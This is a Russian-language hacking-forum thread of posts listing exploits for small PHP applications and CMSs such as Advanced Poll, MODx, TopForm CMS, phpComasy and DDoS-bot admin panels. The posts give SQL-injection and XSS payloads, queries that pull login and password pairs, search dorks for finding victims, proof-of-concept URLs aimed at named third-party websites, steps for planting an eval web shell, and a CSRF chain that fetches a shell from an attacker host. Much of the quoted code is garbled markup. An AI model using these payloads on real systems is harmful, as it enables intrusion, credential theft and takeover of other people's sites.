ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 31.12.2011, 21:03
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами: 7604246

Репутация: 267


По умолчанию

[B][SIZE="2"][COLOR="Green"]Advanced Poll version )

Эксплуатация:

Код:
http;//site.ltd/poll/demo_3.php?poll_id=1+or+1+group+by+concat_ws(0x3a,version(),rand(0)|0)+having+min(0)--+f
Результат:

Код:
Error Number: 1062 Duplicate entry '5.0.77:1' for key 'group_key'
В файл demo_3.php инклудится уязвимый скрипт class_poll.php

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]is_valid_poll_id[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]) {

if ([/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) {

[/
COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT poll_id FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]tbl[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'poll_index'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]" WHERE poll_id=[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#DD0000"]AND status[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]record[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'poll_id'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];

} else {

return[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];

}

}[/COLOR][/COLOR
Dork: inurl:"popup.php?action=results"

Результатов: примерно 204 000 (0,23 сек.) Развлекатейсь

PoC:

Код:
http://www.bookmine.com/poll/demo_3.php?poll_id=11+or+1+group+by+concat_ws(0x3a,version(),rand(0)|0)+having+min(0)--+f
© Ereee​
 
Ответить с цитированием

  #2  
Старый 02.01.2012, 16:33
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами: 7604246

Репутация: 267


По умолчанию

[B][SIZE="2"][COLOR="Green"]MDS-JOB version
 
Ответить с цитированием

  #3  
Старый 02.01.2012, 22:38
trololoman96
Участник форума
Регистрация: 01.12.2011
Сообщений: 120
С нами: 7604246

Репутация: 55
По умолчанию

FC4 - Счетчик посетителей вебсайта

Офф сайт:http://linesoft.org/

Описание:SQL inj

Зависимости:mg=off и rg=on (rg скорей всего будет включен, т.к. если нет то скрипт работать не будет)

Файл: /admin/index.php

Уязвимый код:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"Counter"[/COLOR][COLOR="#007700"])

{

echo[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$AllCommands[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"Counter.Change"[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM fc4 WHERE Name=\"[/COLOR][COLOR="#0000BB"]$Name[/COLOR][COLOR="#DD0000"]\""[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"])

or print
([/COLOR][COLOR="#DD0000"]"Ошибка при MySQL запросе: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

[/COLOR][/COLOR
Авторизации никакой не требуется, там еще есть инъекции в insert,update,delete, эта самая простая

Exploit

Код:
http://127.0.0.1/fc4-0.34/admin/index.php?cmd=Counter&Name=tdsadas"+and+5=4+union+select+1,2,3,4,5,6,7,version()--+
Описание:пассивная xss

Зависимости:rg = on

Файл: admin/counter_form.php

Уязвимый код:

PHP код:
[COLOR="#000000"]

[/
COLOR]">

[/COLOR] 
из за того что register_globals = on и переменные в скрипте не определены по умолчанию, мы можем поменять их содержание

Exploit

Код:
http://127.0.0.1/fc4-0.34/admin/counter_form.php?cmd=">alert(/xss/)
============================

LS GuestBook v1.0

Офф сайт:http://linesoft.org/

Описание:пассивная xss

Зависимости:rg=on (rg скорей всего будет включен, т.к. если нет то скрипт работать не будет)

Файл: /guestbook.php

Уязвимый код:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]Пароль[/COLOR][COLOR="#007700"]:

[/
COLOR][/COLOR
$new_pwd обьявляеться в скрипте только если файла pwd.dat нет, а его нет только при 1 заходе

и установки пароля администратора

Exploit

Код:
http://www.bes-chagda.ru/ls_guestbook/guestbook.php?go=auth&new_pwd=1>alert(/xss/)
пароль администратора есть в куках, зашифрован в md5

=====================

LS Logs 1.22

Офф сайт:http://linesoft.org/

Описание:пассивная xss

Зависимости: rg=on (rg скорей всего будет включен, т.к. если нет то скрипт работать не будет)

Файл: /logsa.php

Уязвимый код:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

[[/COLOR][COLOR="#0000BB"]Фильтр[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]строка в url[/COLOR][COLOR="#007700"]:



[/COLOR][/COLOR
Exploit

Код:
http://127.0.0.1/LSLogs/example/logsa.php?filter_string=">alert(/xss/)
 
Ответить с цитированием

  #4  
Старый 06.01.2012, 10:50
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами: 7604246

Репутация: 267


По умолчанию

Заливка шелла в MODx

Заливка шелла в MODx(тестил на 1.0.5)

1-вариант. Через модуль Doc Manager(можно любой другой или создать свой, юзал Opera):

1) Админка(http://site/manager/) => Сайт => Модули => Doc Manager => В поле "Код модуля(php)" вставляем:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'e'[/COLOR][COLOR="#007700"]])) eval([/COLOR][COLOR="#0000BB"]stripslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'e'[/COLOR][COLOR="#007700"]]));[/COLOR][/COLOR
Сохраняем.

2) Идем:

Админка => Модули => Doc manager(жмите на него колесиком[mouse3])

Открывается новое окно "Менеджер ресурсов". Скопируте адресную строку(http://site/manager/index.php?a=112&id=1).

Жмем Ctrl+U, в самый верх пишем:

Код:
ЖМИ
Применяем изменения. Видим огромную ссылку "ЖМИ", жмем и видим phpinfo();. Если не менять исходник, ругается двиг, типа Anti-CSRF.

2-вариант. Банально:

1) Идем:

Админка > Инструменты => Конфигурация => Файл-менеджер

В поле "Разрешенные к загрузке файлы" через запятую добавляем php.

2) Идем:

Админка => Элементы => Управление файлами => Внизу "Обзор" => Льем шелл в любую папку.

3-вариант. Редактируем прямо из админки php-файлы(если права есть):

1) Идем:

Админка => Элементы => Управление файлами

Видим файлы, рядом с доступной для записи файлов есть зеленая галка, жмем. Появится поле, вставляем код, жмем "Сохранить".

Шелл доступен по адресу http://site.ltd/redaktirovanyi_file.php

---

Раскрытие пути(тестил на 1.0.5)

Код:
http://site/assets/cache/siteCache.idx.php
http://site/assets/plugins/managermanager/example.mm_rules.inc.php
http://site/assets/plugins/managermanager/default.mm_rules.inc.php
http://site/assets/plugins/managermanager/mm.inc.php
etc.
 
Ответить с цитированием

  #5  
Старый 11.01.2012, 14:51
Boolean
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
С нами: 8255126

Репутация: 78
По умолчанию



ArmageddoN DDoS Bots 2.0




SQL Инъекция & Выполнение кода


NEED:magic_quotes_gpc = Off, admin_rights

Уязвимый участок кода:

index.php

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]fwrite[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fh[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fh[/COLOR][COLOR="#007700"]);

}

[...]
if(isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'url'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'url'[/COLOR][COLOR="#007700"]]!=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]){

[/
COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'url'[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"n"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]addcommand[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]); }

[...][/
COLOR][/COLOR
PoC:

Добавляем новую команду с текстом:

Код:
'; @eval($_REQUEST['cmd']); $a='lol
Exec: /command.php?cmd=phpinfo();

Чтение содержимого файлов (config.php+)

NEED:admin_rights

editheaders.php

Уязвимый участок кода:

[PHP]
[COLOR="#000000"][COLOR="#007700"]&filename=shell.php%00 (при условии magic_quotes_gpc = Off)
?com=Save&data=&filename=shell.php////[4096 слешей]////
[/CODE]




Раскрытие путей

Почти в каждом файле(login.php+)

Уязвимый участок кода:




Код:
session_start();
PoC:

Код:
Cookie: PHPSESSID=!@#$%^&*()_+;



©0x0000ED.COM, Boolean​
 
Ответить с цитированием

  #6  
Старый 17.02.2012, 21:56
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию

TopForm CMS
офф. сайт

error-based sql

уязвимый параметр issue_id

Код:
issue_id=7'+and+(select+1+from(select+count(*),concat((select+concat(login,0x3a,password)+from+users+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)+--+
так же уязвимы параметры id и cat

в админке:

/admin.php

sql в post-запросе логина

уязвимый параметр parent

Код:
admin.php?a=issues&parent=11+and+(select+1+from(select+count(*),concat((select+concat(login,0x3a,password)+from+users+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)+--+&action=new
так же issue_id, class

PoC:

Код:
http://bzhi.ru/?issue_id=7&cat=2'+and+(select+1+from(select+count(*),concat((select+concat(login,0x3a,password)+from+users+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)+--+
dork:

Код:
inurl:"index.php?issue_id="
© faza02
 
Ответить с цитированием

  #7  
Старый 04.03.2012, 00:03
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 0
С нами: 10992741

Репутация: 0
По умолчанию

memento cms 2

memento cms 2

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]index[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]issue_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]sql inj[/COLOR][/COLOR
админка: admin.php

пароли не хэшированны

хотя возможно это и есть то что в предидущем посте
 
Ответить с цитированием

  #8  
Старый 04.03.2012, 09:15
Boolean
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
С нами: 8255126

Репутация: 78
По умолчанию

Обзор уязвимостей админ панели Dirt Jumper 5

SQL Inj [INSERT]

/index.php:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][...]

[/
COLOR][COLOR="#0000BB"]$ip[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'k'[/COLOR][COLOR="#007700"]];

[...]

[/
COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]" INSERT INTO `td` (`ip`,`ip2`,`time`)VALUES('[/COLOR][COLOR="#0000BB"]$ip[/COLOR][COLOR="#DD0000"]','[/COLOR][COLOR="#0000BB"]$ip2[/COLOR][COLOR="#DD0000"]','[/COLOR][COLOR="#0000BB"]$time[/COLOR][COLOR="#DD0000"]')"[/COLOR][COLOR="#007700"]);

[...]

[/
COLOR][/COLOR
Из инъекции особо ничего не вытянуть, но «обесточить» сервер можно, воспользовавшись тем же BENCHMARK'ом.

Если честно, непонятно, что курили разработчики, но команды хранятся в файле img.gif и для показа ботам файл инклудится.

/index.php:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][...]

include[/
COLOR][COLOR="#DD0000"]"img.gif"[/COLOR][COLOR="#007700"];

[...]

[/
COLOR][/COLOR
Code Execution

Нужны права админа.

1. Добавляем новую команду:

Код:

* Никакой фильтрации нет вообще.

2. POST index.php:

Код:
k=1&cmd=phpinfo()
Если знаете параметр $GET_login, который прописывается в конфиге(по дефолту dj5) можно провернуть CSRF результатом которого будет выполнение php кода и xss.

Код:
" />
Где http://EVILHOST.COM/EVIL.JS ссылка на ваш зловредный js код.

* Можно еще сразу же средствами js отправить POST запрос на /index.php, и выполнить код, например

Код:
copy("http://evilhost.com/shell.txt", "shell.php"); file_put_contents("img.gif", "");
Тогда шелл автоматически зальется(если прав хватит), а img.gif очистится.
 
Ответить с цитированием

  #9  
Старый 17.05.2012, 13:29
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию

Уязвимый скрипт: public.php

Уязвимая функция:

display_fns.php

Цитата:
Сообщение от None  
global $id_n;
$conn_nt=db_connect("select id_pub, name, link, text
from pub
where id_pub =
$id_n
");
$pub_text=mysql_fetch_array($conn_nt);
$id_pub="$pub_text[id_pub]";
$name="$pub_text[name]";
$text="$pub_text[text]";
$link="$pub_text[link]";
echo "$name";
echo "$link";
echo "";
echo "$text";
}
exploit:

http://bionat.ru/public.php?id_n=-24+union+select+concat_ws(0x3a,user_name,password) ,2,3+from+user

http://bogan.ru/service.php?id_s=27999+union+select+concat_ws(0x3a ,user_name,password),2,3+from+user

http://kalmatron-s.ru/public.php?id_n=-24+union+select+1,concat_ws(0x3a,user_name,passwor d),3+from+user

google:

intext:"Copyright © 2002 - 2012, Интернет-агентство «Боган»"

profit:

Для устранения уязвимости достаточно добавить функцию intval();

code:

Цитата:
Сообщение от None  
$conn_nt=db_connect("select id_pub, name, link, text
from pub
where id_pub =
intval($id_n)
");
 
Ответить с цитированием

  #10  
Старый 04.06.2012, 15:42
.Varius
Banned
Регистрация: 05.05.2009
Сообщений: 1,334
С нами: 8957186

Репутация: 796


По умолчанию

phpComasy 1.0.1

index.php

PHP код:
[COLOR="#000000"]
[COLOR="#0000BB"][/COLOR][COLOR="#0000BB"]data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]= &[/COLOR][COLOR="#0000BB"]$web[/COLOR][COLOR="#007700"];

}





function
[/COLOR][COLOR="#0000BB"]get_search_form[/COLOR][COLOR="#007700"]() {

[/
COLOR][COLOR="#0000BB"]$return[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$return[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]' '[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$return[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$return[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

return[/COLOR][COLOR="#0000BB"]$return[/COLOR][COLOR="#007700"];

}





function
[/COLOR][COLOR="#0000BB"]form_search[/COLOR][COLOR="#007700"]() {

[/
COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]title[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]_SEARCH[/COLOR][COLOR="#007700"];



[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]introduction[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];



[/COLOR][COLOR="#0000BB"]$return[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$return[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_SEARCH_STRING[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'

'
[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$return[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$return[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];



[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#0000BB"]$return[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

}



function
[/COLOR][COLOR="#0000BB"]search_result[/COLOR][COLOR="#007700"]() {

[/
COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]title[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]_SEARCH[/COLOR][COLOR="#007700"];



[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]introduction[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];



[/COLOR][COLOR="#FF8000"]// Security check

[/COLOR][COLOR="#0000BB"]$searchtext[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"](array([/COLOR][COLOR="#DD0000"]"%"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"&"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]";"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"?"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"/"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"\\"[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'searchtext'[/COLOR][COLOR="#007700"]]);

[/
COLOR][COLOR="#0000BB"]$searchtext_umlaut[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]tools[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]umlaut[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$searchtext[/COLOR][COLOR="#007700"]);



if
([/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$searchtext[/COLOR][COLOR="#007700"]) >=[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]) {



[/COLOR][COLOR="#0000BB"]$search_query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM `#__page_language` WHERE language='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]language[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_current_language[/COLOR][COLOR="#007700"]().[/COLOR][COLOR="#DD0000"]"' AND (LOWER(title) LIKE '%"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$searchtext[/COLOR][COLOR="#007700"])).[/COLOR][COLOR="#DD0000"]"%' OR LOWER(introduction) LIKE '%"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$searchtext[/COLOR][COLOR="#007700"])).[/COLOR][COLOR="#DD0000"]"%' OR LOWER(content) LIKE '%"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$searchtext[/COLOR][COLOR="#007700"])).[/COLOR][COLOR="#DD0000"]"%' OR LOWER(title) LIKE '%"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$searchtext_umlaut[/COLOR][COLOR="#007700"])).[/COLOR][COLOR="#DD0000"]"%' OR LOWER(introduction) LIKE '%"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$searchtext_umlaut[/COLOR][COLOR="#007700"])).[/COLOR][COLOR="#DD0000"]"%' OR LOWER(content) LIKE '%"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$searchtext_umlaut[/COLOR][COLOR="#007700"])).[/COLOR][COLOR="#DD0000"]"%');"[/COLOR][COLOR="#007700"]);

[/
COLOR][/COLOR
example:

Код:
http://www.ssk66.de/?action=search_result
     
    POST: searchtext=sad') or (select count(*)from information_schema.tables group by concat((version()),floor(rand(0)*2)))or('
shell upload:

classes/class.file_manager.php

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]file_upload[/COLOR][COLOR="#007700"]() {

if ([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]security[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]check_security[/COLOR][COLOR="#007700"]() ==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]||[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]security[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]check_access_for_area[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'filemanager'[/COLOR][COLOR="#007700"])) {

if ([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]]) {

[/
COLOR][COLOR="#0000BB"]$extention[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]strrchr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"]));

[/
COLOR][COLOR="#0000BB"]chmod[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]0644[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]//chmod fixchmod ($_FILES['file']['tmp_name'],0644); //chmod fix



